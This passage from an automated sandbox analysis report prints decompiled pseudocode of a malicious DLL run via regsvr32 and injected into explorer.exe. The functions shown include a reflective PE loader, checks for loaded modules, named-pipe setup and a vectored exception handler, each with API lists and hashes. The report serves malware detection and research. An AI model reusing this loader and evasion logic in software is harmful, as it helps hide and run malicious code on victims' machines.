									E1000861A( &_v612, 0xfffffffe);
								}
								E100085D5( &_v616);
								_t150 =  *0x1001e688; // 0x2d90590
								lstrcpynW(_t150 + 0x438,  *0x1001e740, 0x105);
								_t153 =  *0x1001e688; // 0x2d90590
								_t154 = _t153 + 0x228;
								__eflags = _t154;
								lstrcpynW(_t154,  *0x1001e738, 0x105);
								_t331 =  *0x1001e688; // 0x2d90590
								_t117 = _t331 + 0x228; // 0x2d907b8
								 *((intOrPtr*)(_t331 + 0x434)) = E10008FBE(_t117, __eflags);
								E1000861A(0x1001e740, 0xfffffffe);
								E1000861A(0x1001e738, 0xfffffffe);
								L41:
								_t159 = 0;
								__eflags = 0;
								L42:
								return _t159;
							}
							__eflags = _t238 - 2;
							if(_t238 != 2) {
								goto L36;
							}
							goto L17;
						}
					}
					L8:
					_t159 = _t122 | 0xffffffff;
					goto L42;
				}
				_t250 = E100095C7(0x6e2);
				_v616 = _t250;
				_t326 = E100095C7(0x9f5);
				_v612 = _t326;
				if(_t250 != 0 && _t326 != 0) {
					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
						_v620 = 1;
					}
					E100085C2( &_v616);
					_t122 = E100085C2( &_v612);
					_t351 = _v620;
					if(_v620 != 0) {
						goto L8;
					}
				}
			}


















































































                            0x10004d6d
                            0x10004d73
                            0x10004d79
                            0x10004d7e
                            0x10004d8c
                            0x10004d8f
                            0x10004dee
                            0x10004e00
                            0x10004e03
                            0x10004e0a
                            0x10004e0f
                            0x10004e14
                            0x10004e1b
                            0x10004e25
                            0x10004e2c
                            0x10004e37
                            0x10004e3c
                            0x10004e43
                            0x10004e49
                            0x10004e4b
                            0x10004e4c
                            0x10004e50
                            0x10004e5b
                            0x10004e60
                            0x10004e69
                            0x10004e6e
                            0x10004e76
                            0x10004e7d
                            0x10004e7e
                            0x10004e80
                            0x10004e9c
                            0x10004e9f
                            0x10004e9f
                            0x10004ea8
                            0x10004ead
                            0x10004ebd
                            0x10004ec5
                            0x10004eca
                            0x10004ed0
                            0x10004ed3
                            0x10004ed9
                            0x10004ef8
                            0x10004efe
                            0x10004eff
                            0x10004f00
                            0x10004f01
                            0x10004f02
                            0x10004f03
                            0x10004f0d
                            0x10004f11
                            0x10004f16
                            0x10004f19
                            0x10004f1b
                            0x10004f2d
                            0x10004f2d
                            0x10004f2f
                            0x10004f3b
                            0x10004f40
                            0x10004f46
                            0x10004f4f
                            0x10004f52
                            0x10004f54
                            0x10004f5f
                            0x10004f64
                            0x10004f69
                            0x10004f6e
                            0x10004f6e
                            0x10004f71
                            0x10004f78
                            0x00000000
                            0x10004f7e
                            0x10004f7e
                            0x10004f83
                            0x10004f87
                            0x10004f89
                            0x10004f8c
                            0x10004f8e
                            0x10004f94
                            0x10004f94
                            0x10004f8e
                            0x10004f96
                            0x10004f9b
                            0x10004fa1
                            0x10004fa3
                            0x00000000
                            0x10004fa9
                            0x10004fa9
                            0x10004fad
                            0x10005082
                            0x10005088
                            0x1000508e
                            0x10005099
                            0x1000509a
                            0x1000509b
                            0x1000509c
                            0x100050a2
                            0x100050a7
                            0x100050ad
                            0x100050b5
                            0x100050bb
                            0x100050be
                            0x100050cd
                            0x100050d4
                            0x100050d7
                            0x100050e4
                            0x100050e8
                            0x100050f5
                            0x100050fa
                            0x100050fd
                            0x100050ff
                            0x10005110
                            0x10005112
                            0x10005116
                            0x10005117
                            0x10005119
                            0x10005124
                            0x10005129
                            0x10005136
                            0x1000513a
                            0x1000513b
                            0x1000513d
                            0x10005145
                            0x10005146
                            0x1000514b
                            0x10005163
                            0x10005168
                            0x1000516b
                            0x1000516f
                            0x10005171
                            0x10005184
                            0x1000518e
                            0x10005192
                            0x1000519a
                            0x1000519b
                            0x100051a3
                            0x100051a4
                            0x100051a9
                            0x100051b5
                            0x100051bf
                            0x100051d1
                            0x100051dd
                            0x100051e2
                            0x100051e2
                            0x100051ec
                            0x100051f2
                            0x100051f2
                            0x10005119
                            0x100050ff
                            0x00000000
                            0x10005088
                            0x10004fb3
                            0x10004fb6
                            0x00000000
                            0x00000000
                            0x10004fbc
                            0x10004fc7
                            0x10004fc8
                            0x10004fc9
                            0x10004fca
                            0x10004fd0
                            0x10004fd5
                            0x10004fe9
                            0x10004fee
                            0x10004ff2
                            0x10004ffd
                            0x10005006
                            0x10005008
                            0x1000500c
                            0x1000500d
                            0x1000500f
                            0x1000501a
                            0x10005020
                            0x10005032
                            0x10005035
                            0x10005038
                            0x10005045
                            0x1000504d
                            0x10005057
                            0x10005069
                            0x10005075
                            0x1000507a
                            0x00000000
                            0x1000500f
                            0x10004fa3
                            0x10004edb
                            0x10004edb
                            0x10004ee1
                            0x10004ee3
                            0x00000000
                            0x00000000
                            0x10004ee5
                            0x10004ee9
                            0x100051f3
                            0x100051f8
                            0x100051fe
                            0x10005200
                            0x10005201
                            0x10005205
                            0x10005215
                            0x1000521a
                            0x1000521e
                            0x10005220
                            0x10005224
                            0x10005229
                            0x1000522b
                            0x1000522d
                            0x10005233
                            0x10005233
                            0x10005240
                            0x10005246
                            0x1000524c
                            0x10005251
                            0x1000526f
                            0x10005271
                            0x1000527d
                            0x1000527d
                            0x10005283
                            0x10005285
                            0x1000528b
                            0x1000529d
                            0x100052a3
                            0x100052af
                            0x100052b7
                            0x100052b7
                            0x100052b7
                            0x100052b9
                            0x100052bf
                            0x100052bf
                            0x10004eef
                            0x10004ef2
                            0x00000000
                            0x00000000
                            0x00000000
                            0x10004ef2
                            0x10004ed9
                            0x10004e1d
                            0x10004e1d
                            0x00000000
                            0x10004e1d
                            0x10004d9b
                            0x10004da2
                            0x10004dab
                            0x10004dad
                            0x10004db3
                            0x10004dc4
                            0x10004dcd
                            0x10004dcd
                            0x10004dd9
                            0x10004de2
                            0x10004de7
                            0x10004dec
                            0x00000000
                            0x00000000
                            0x10004dec

                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 10004DC0
                            • GetModuleHandleA.KERNEL32(00000000), ref: 10004DC7
                            • lstrcpynW.KERNEL32(02D90158,00000105), ref: 1000526F
                            • lstrcpynW.KERNEL32(02D90368,00000105), ref: 10005283
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleModulelstrcpyn
                            • String ID:
                            • API String ID: 3430401031-0
                            • Opcode ID: dea4718fcff11b40ad77ac1c7875c25be4704c52ca9a87ecd19dbb36a7e3fe5b
                            • Instruction ID: cc48400d40a66e7674bcd18edc35038107661711004b249490cc292a5082b98a
                            • Opcode Fuzzy Hash: dea4718fcff11b40ad77ac1c7875c25be4704c52ca9a87ecd19dbb36a7e3fe5b
                            • Instruction Fuzzy Hash: A7E1CC71608341AFF340CF64CC86F6A73E9EB88390F454A29F584DB2D5EB75EA448B52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 10012AEC, Relevance: 6.2, APIs: 4, Instructions: 219libraryloaderCOMMON
                            Download Yara Rule
                            C-Code - Quality: 52%
                            			E10012AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}





























                            0x10012afb
                            0x10012b01
                            0x10012b0a
                            0x10012b0d
                            0x10012b10
                            0x00000000
                            0x10012c01
                            0x10012c05
                            0x10012c07
                            0x10012c15
                            0x10012d33
                            0x10012d3c
                            0x10012d3f
                            0x10012d43
                            0x10012d49
                            0x10012d51
                            0x10012d51
                            0x10012d59
                            0x00000000
                            0x10012d64
                            0x10012c1b
                            0x10012c24
                            0x10012c32
                            0x10012c35
                            0x10012c52
                            0x10012c59
                            0x10012c6b
                            0x10012c6b
                            0x10012c72
                            0x10012c82
                            0x10012c9a
                            0x10012c84
                            0x10012c8c
                            0x10012c8c
                            0x10012c9d
                            0x10012ca1
                            0x10012cb1
                            0x10012cd4
                            0x10012ce6
                            0x10012cb3
                            0x10012cc7
                            0x10012cc7
                            0x10012cf0
                            0x10012d0c
                            0x10012cf2
                            0x10012d01
                            0x10012d01
                            0x10012d14
                            0x10012d1d
                            0x10012d1d
                            0x10012d2b
                            0x00000000
                            0x10012c74
                            0x10012c76
                            0x00000000
                            0x10012c76
                            0x10012c72
                            0x00000000
                            0x10012c35
                            0x10012b18
                            0x10012b26
                            0x10012b2b
                            0x10012b36
                            0x10012b39
                            0x10012b3d
                            0x10012b3f
                            0x10012b4f
                            0x10012b58
                            0x10012b61
                            0x10012b69
                            0x10012b72
                            0x10012b7d
                            0x10012b83
                            0x10012b86
                            0x10012b89
                            0x10012b90
                            0x10012b97
                            0x00000000
                            0x00000000
                            0x10012ba2
                            0x10012bb0
                            0x10012bbb
                            0x10012bc5
                            0x10012bdd
                            0x10012bea
                            0x10012bea
                            0x10012bc7
                            0x10012bd2
                            0x10012bd2
                            0x10012bf1
                            0x10012bf1
                            0x10012bf9
                            0x10012bf9
                            0x00000000

                            APIs
                            • GetModuleHandleA.KERNEL32(?), ref: 10012C4C
                            • LoadLibraryA.KERNEL32(?), ref: 10012C65
                            • GetProcAddress.KERNEL32(00000000,890CC483), ref: 10012CC1
                            • GetProcAddress.KERNEL32(00000000,?), ref: 10012CE0
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleLibraryLoadModule
                            • String ID:
                            • API String ID: 384173800-0
                            • Opcode ID: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
                            • Instruction ID: 2edd54a6eb651874f6cc264e5dd0ce055865838d2197d7e71e48a8f46057b6f1
                            • Opcode Fuzzy Hash: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
                            • Instruction Fuzzy Hash: 62A168B5E00219DFCB40CFA8D881AADBBF1FF08354F108469E915AB351D734EA91CB64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 10001C68, Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                            Download Yara Rule
                            C-Code - Quality: 75%
                            			E10001C68(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0x1001e6dc; // 0x0
				_t13 = E1000A4BF(_t41, 0);
				while(_t13 < 0) {
					E1000980C( &_v28);
					_t43 =  *0x1001e6e0; // 0x0
					_t15 =  *0x1001e6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0x1001e684; // 0x2e0faa0
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x1001e6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0x1001e684; // 0x2e0faa0
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0x1001e6dc; // 0x0
						__eflags = 0;
						_t13 = E1000A4BF(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0x1001e6e8; // 0x0
				_v28 = _t20;
				_t22 = E1000A6A9(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x1001e6d0, 0, 0, 2);
					E1000980C(0x1001e6e0);
					_t64 = E10001A1B( &_v28, E10001226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0x1001e760);
						_t51 = 0x27;
						E10009F06(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0x1001e684; // 0x2e0faa0
				 *((intOrPtr*)(_t29 + 0x30))( *0x1001e6d0);
				_t48 =  *0x1001e6dc; // 0x0
				 *0x1001e6d0 = 0;
				E1000A4DB(_t48);
				E1000861A( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

























                            0x10001c68
                            0x10001c75
                            0x10001c77
                            0x10001c7e
                            0x10001ce4
                            0x10001c8b
                            0x10001c90
                            0x10001c96
                            0x10001c9b
                            0x10001ca1
                            0x10001ca3
                            0x10001ca7
                            0x10001d15
                            0x10001d17
                            0x10001d99
                            0x10001d9f
                            0x10001d9f
                            0x10001ca9
                            0x10001cb1
                            0x10001cb1
                            0x10001cbd
                            0x10001cc3
                            0x10001cc5
                            0x00000000
                            0x00000000
                            0x10001cc7
                            0x10001cd1
                            0x10001cd7
                            0x10001cdd
                            0x10001cdf
                            0x00000000
                            0x10001cdf
                            0x10001cab
                            0x10001caf
                            0x00000000
                            0x00000000
                            0x00000000
                            0x10001caf
                            0x10001cee
                            0x10001cef
                            0x10001cf0
                            0x10001cf1
                            0x10001cf2
                            0x10001cf7
                            0x10001d01
                            0x10001d06
                            0x10001d0e
                            0x10001d29
                            0x10001d2c
                            0x10001d36
                            0x10001d41
                            0x10001d54
                            0x10001d56
                            0x10001d58
                            0x10001d5a
                            0x10001d5b
                            0x10001d63
                            0x10001d64
                            0x10001d6a
                            0x10001d10
                            0x10001d10
                            0x10001d10
                            0x10001d6b
                            0x10001d76
                            0x10001d79
                            0x10001d7f
                            0x10001d85
                            0x10001d90
                            0x10001d97
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
                            • Instruction ID: 912c1b93fe30e14ebce55579952f4eddc1cb52f7c5d97e94b218bb2c615be3ff
                            • Opcode Fuzzy Hash: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
                            • Instruction Fuzzy Hash: C831C036604264AFF344DFA4DCC5C6E77A9FB983D0B904A2AF941C32A5DA30ED048B52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 10001B2D, Relevance: 6.1, APIs: 4, Instructions: 97threadCOMMON
                            Download Yara Rule
                            C-Code - Quality: 73%
                            			E10001B2D(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0x1001e6f4; // 0x0
				_t12 = E1000A4BF(_t38, 0);
				while(_t12 < 0) {
					E1000980C( &_v28);
					_t40 =  *0x1001e700; // 0x0
					_t14 =  *0x1001e704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0x1001e684; // 0x2e0faa0
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x1001e6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0x1001e684; // 0x2e0faa0
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0x1001e6f4; // 0x0
								__eflags = 0;
								_t12 = E1000A4BF(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E1000980C(0x1001e700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x1001e6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0x1001e6e8; // 0x0
				_v28 = _t24;
				_t61 = E10001A1B( &_v28, E1000131E, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0x1001e760);
					_t48 = 0x27;
					E10009F06(_t48);
				}
				if(_v24 != 0) {
					E10006890( &_v24);
				}
				_t26 =  *0x1001e684; // 0x2e0faa0
				 *((intOrPtr*)(_t26 + 0x30))( *0x1001e6ec);
				_t28 =  *0x1001e758; // 0x0
				 *0x1001e6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0x1001e6f4; // 0x0
				 *0x1001e758 =  !=  ? 1 : _t28;
				E1000A4DB(_t46);
				_t15 = _t61;
				goto L12;
			}
























                            0x10001b2d
                            0x10001b33
                            0x10001b41
                            0x10001baf
                            0x10001b4e
                            0x10001b53
                            0x10001b59
                            0x10001b5e
                            0x10001b64
                            0x10001b66
                            0x10001b6a
                            0x10001c64
                            0x10001c64
                            0x10001b70
                            0x10001b70
                            0x10001b7c
                            0x10001b7c
                            0x10001b88
                            0x10001b8e
                            0x10001b90
                            0x00000000
                            0x10001b92
                            0x10001b92
                            0x10001b9c
                            0x10001ba2
                            0x10001ba8
                            0x10001baa
                            0x00000000
                            0x10001baa
                            0x10001b72
                            0x10001b72
                            0x10001b76
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x10001b76
                            0x10001b70
                            0x10001c5d
                            0x10001c63
                            0x10001c63
                            0x10001bb8
                            0x10001bcc
                            0x10001bcf
                            0x10001bd9
                            0x10001be5
                            0x10001bef
                            0x10001bf0
                            0x10001bf1
                            0x10001bf2
                            0x10001bf7
                            0x10001c00
                            0x10001c04
                            0x10001c06
                            0x10001c07
                            0x10001c0f
                            0x10001c10
                            0x10001c16
                            0x10001c1b
                            0x10001c21
                            0x10001c21
                            0x10001c26
                            0x10001c31
                            0x10001c34
                            0x10001c3c
                            0x10001c48
                            0x10001c4b
                            0x10001c51
                            0x10001c56
                            0x10001c5b
                            0x00000000

                            APIs
                            • GetCurrentProcess.KERNEL32(1001E6EC,00000000,00000000,00000002), ref: 10001BCC
                            • GetCurrentThread.KERNEL32(00000000), ref: 10001BCF
                            • GetCurrentProcess.KERNEL32(00000000), ref: 10001BD6
                            • DuplicateHandle.KERNEL32 ref: 10001BD9
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Current$Process$DuplicateHandleThread
                            • String ID:
                            • API String ID: 3566409357-0
                            • Opcode ID: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
                            • Instruction ID: 6a0302f5f4fd7db6b8bd225124d86af098f07b21623db759acfbad22203cc7cf
                            • Opcode Fuzzy Hash: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
                            • Instruction Fuzzy Hash: 50319C756083A19FF744DF64CCD886E77A9EB983D0B418968F601872A6DB30EC44CB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Analysis Process: explorer.exe PID: 2980 Parent PID: 2176 explorer.exeCOMMON

                            Executed Functions

                            Function 000831C2, Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                            Download Yara Rule
                            C-Code - Quality: 79%
                            			E000831C2(void* __edx, void* __eflags) {
				CHAR* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				signed int _t10;
				intOrPtr _t11;
				intOrPtr _t12;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t22;
				intOrPtr _t28;
				void* _t38;
				CHAR* _t40;

				_t38 = __edx;
				_t28 =  *0x9e688; // 0xb0000
				_t10 = E0008C292( *((intOrPtr*)(_t28 + 0xac)), __eflags);
				_t40 = _t10;
				_v8 = _t40;
				if(_t40 != 0) {
					_t11 = E00088604(0x80000); // executed
					 *0x9e724 = _t11;
					__eflags = _t11;
					if(_t11 != 0) {
						_t12 = E0008BD10(); // executed
						_v16 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_push(0xc);
							_pop(0);
							_v12 = 1;
						}
						_v20 = 0;
						__eflags = 0;
						asm("sbb eax, eax");
						_t16 = CreateNamedPipeA(_t40, 0x80003, 6, 0xff, 0x80000, 0x80000, 0, 0 &  &_v20);
						 *0x9e674 = _t16;
						__eflags = _t16 - 0xffffffff;
						if(_t16 != 0xffffffff) {
							E0008BC7A( &_v20, _t38); // executed
							_t18 = E000898EE(E000832A1, 0, __eflags, 0, 0); // executed
							__eflags = _t18;
							if(_t18 != 0) {
								goto L12;
							}
							_t22 =  *0x9e684; // 0x286f8f0
							 *((intOrPtr*)(_t22 + 0x30))( *0x9e674);
							_push(0xfffffffd);
							goto L11;
						} else {
							 *0x9e674 = 0;
							_push(0xfffffffe);
							L11:
							_pop(0);
							L12:
							E0008861A( &_v8, 0xffffffff);
							return 0;
						}
					}
					_push(0xfffffff5);
					goto L11;
				}
				return _t10 | 0xffffffff;
			}
















                            0x000831c2
                            0x000831c8
                            0x000831d8
                            0x000831dd
                            0x000831df
                            0x000831e4
                            0x000831f5
                            0x000831fa
                            0x00083200
                            0x00083202
                            0x0008320b
                            0x00083210
                            0x00083213
                            0x00083215
                            0x00083217
                            0x00083219
                            0x0008321a
                            0x0008321a
                            0x00083227
                            0x0008322a
                            0x0008322f
                            0x00083249
                            0x0008324f
                            0x00083254
                            0x00083257
                            0x00083263
                            0x00083271
                            0x00083278
                            0x0008327a
                            0x00000000
                            0x00000000
                            0x0008327c
                            0x00083287
                            0x0008328a
                            0x00000000
                            0x00083259
                            0x00083259
                            0x0008325f
                            0x0008328c
                            0x0008328c
                            0x0008328d
                            0x00083293
                            0x00000000
                            0x0008329c
                            0x00083257
                            0x00083204
                            0x00000000
                            0x00083204
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6bab0573e060300c16f750c3d2d8a24a33e2e11bb09ca3b5967ac9be5f3208f7
                            • Instruction ID: 8572b94192bc1e43ddf863f0276067eeaee28e73aa111561e36aea24d5a940c8
                            • Opcode Fuzzy Hash: 6bab0573e060300c16f750c3d2d8a24a33e2e11bb09ca3b5967ac9be5f3208f7
                            • Instruction Fuzzy Hash: 6821C872604211AAEB10FBB9EC45FAE77A8FB95B74F20032AF165D71D1EE3489008751
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00085A61, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00085A61(void* __eflags) {
				intOrPtr _t2;
				void* _t6;
				void* _t7;

				_t2 =  *0x9e684; // 0x286f8f0
				 *((intOrPtr*)(_t2 + 0x108))(1, E00085A06);
				E00085631(_t6, _t7); // executed
				return 0;
			}






                            0x00085a61
                            0x00085a6d
                            0x00085a73
                            0x00085a7a

                            APIs
                            • RtlAddVectoredExceptionHandler.NTDLL(00000001,00085A06,00085CE8), ref: 00085A6D
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionHandlerVectored
                            • String ID:
                            • API String ID: 3310709589-0
                            • Opcode ID: bf483f35d551d8ef1a3c1b7981991285dfd450bd0acbef69aa8c4020bc965baf
                            • Instruction ID: 435aaf7462d5f916828f25a0b113b0bfc22426b62e8c3a1df64e723560edf676
                            • Opcode Fuzzy Hash: bf483f35d551d8ef1a3c1b7981991285dfd450bd0acbef69aa8c4020bc965baf
                            • Instruction Fuzzy Hash: 2FB092312509409BD640FB60CC8AEC83290BB20782F4100A072858A0A3DAE048906702
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00084A0B, Relevance: 9.3, APIs: 6, Instructions: 285stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 79%
                            			E00084A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1144;
				char _v1148;
				void* __esi;
				intOrPtr _t66;
				intOrPtr _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t80;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				intOrPtr _t106;
				intOrPtr _t107;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
